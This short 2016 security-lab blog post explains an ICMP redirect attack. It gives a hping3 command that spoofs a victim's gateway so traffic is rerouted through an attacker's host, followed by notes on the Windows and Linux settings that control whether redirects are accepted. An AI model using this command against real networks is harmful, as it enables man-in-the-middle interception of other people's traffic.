SBM Labs

Cyber Security Collaboration Project

ICMP Redirect Attack
13 Jul 2016

In order to send ICMP redirect packet you can use hping3 utility.

$ man hping3

hping3 - send (almost) arbitrary TCP/IP packets to network hosts

Example of usage.

# hping3 [VICTIM IP ADDRESS] -C 5 -K 1 -a [VICTIM DEFAULT GW IP ADDRESS] --icmp-gw [ATTACKER IP ADDRESS] --icmp-ipdst [DST IP ADDRESS] --icmp-ipsrc [VICTIM IP ADDRESS]

Note for Windows hosts.

By default ICMP Redirect is enabled in Windows. It is managed by the registry parameter EnableICMPRedirect which is located in HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters. But you should remember that ICMP redirect packets can by blocked by Windows Firewall.

Note for Linux hosts.

Keep in mind these parameters:
- /proc/sys/net/ipv4/conf/all/accept_redirects (TRUE by default)
- /proc/sys/net/ipv4/conf/all/secure_redirects (TRUE by default)
- /proc/sys/net/ipv4/conf/all/shared_media (TRUE by default)